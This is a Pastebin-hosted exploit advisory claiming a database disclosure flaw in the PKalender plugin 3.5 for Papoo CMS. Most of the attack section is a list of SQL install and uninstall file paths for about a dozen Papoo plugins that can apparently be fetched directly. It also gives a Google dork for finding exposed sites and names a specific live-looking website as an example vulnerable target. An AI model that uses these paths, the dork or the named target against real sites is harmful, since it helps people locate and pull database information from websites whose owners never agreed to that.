Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Papoo CMS PKalender Plugins 3.5 Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 28/01/2019
- # Vendor Homepage : papoo.de
- # Software Download Links :
- + papoo.de/index.php?menuid=169&downloadid=352&reporeid=349
- + papoo.de/free-cms-kostenloser-download.html
- + papoo.de/6-papoo-pro-downloadversion.html
- + papoo.de/18-papoo-business-version-downloadversion.html
- + papoo.de/147-papoo-enterprise-cms.html
- # Software Information Link : papoo.de/f-2-12-153-kalender-plugin.html
- # Software Version : 3.5 and 4
- # Software Price : Priceless and Priced [ 99 Euro - 379 Euro - 699 Euro ]
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:/plugins/pkalender/sql/
- # Vulnerability Type : CWE-200 [ Information Exposure ]
- ####################################################################
- # Impact :
- **********
- Papoo CMS PKalender Plugins 3.5 has database disclosure vulnerability because,
- information exposure is the intentional or unintentional disclosure of
- information to an actor that is not explicitly authorized to have access to that information.
- ####################################################################
- # Database Disclosure Exploit :
- ***************************
- /plugins/pkalender/sql/pkalender_deinstall.sql
- /plugins/pkalender/sql/pkalender_install.sql
- /plugins/pkalender/sql/update.sql
- # Other Plugins Database Disclosure Exploit =>
- *****************************************
- /plugins/fb_plugin/sql/fb_plugin_deinstall.sql
- /plugins/fb_plugin/sql/fb_plugin_install.sql
- /plugins/fb_plugin/sql/update.sql
- /plugins/fb_plugin/sql/update.sql
- /plugins/freiemodule/sql/freiemoduleplugin_install.sql
- /plugins/galerie/sql/galerie_deinstall.sql
- /plugins/galerie/sql/galerie_install.sql
- /plugins/lagsh/sql/lagsh_deinstall.sql
- /plugins/lagsh/sql/lagsh_install.sql
- /plugins/lagsh_termine/sql/lagsh_termine_deinstall.sql
- /plugins/lagsh_termine/sql/lagsh_termine_install.sql
- /plugins/newsletter_lagsh/sql/newsletter_lagsh_deinstall.sql
- /plugins/newsletter_lagsh/sql/newsletter_lagsh_install.sql
- /plugins/projekte/sql/projekt_deinstall.sql
- /plugins/projekte/sql/projekt_install.sql
- /plugins/rssfeed/sql/test_deinstall.sql
- /plugins/rssfeed/sql/test_install.sql
- /plugins/selbsthilfe/sql/selbsthilfe_deinstall.sql
- /plugins/selbsthilfe/sql/selbsthilfe_install.sql
- /plugins/social_media_buttons/sql/social_media_buttons_deinstall.sql
- /plugins/social_media_buttons/sql/social_media_buttons_install.sql
- /plugins/sprechomat/sql/sprechomat_deinstall.sql
- /plugins/sprechomat/sql/sprechomat_install.sql
- /plugins/umfrage/sql/umfrage_delete.sql
- /plugins/umfrage/sql/umfrage_install.sql
- ###################################################################
- # Example Vulnerable Site :
- *************************
- [+] selbsthilfenetzwerk-sachsen.de/plugins/pkalender/sql/pkalender_install.sql
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement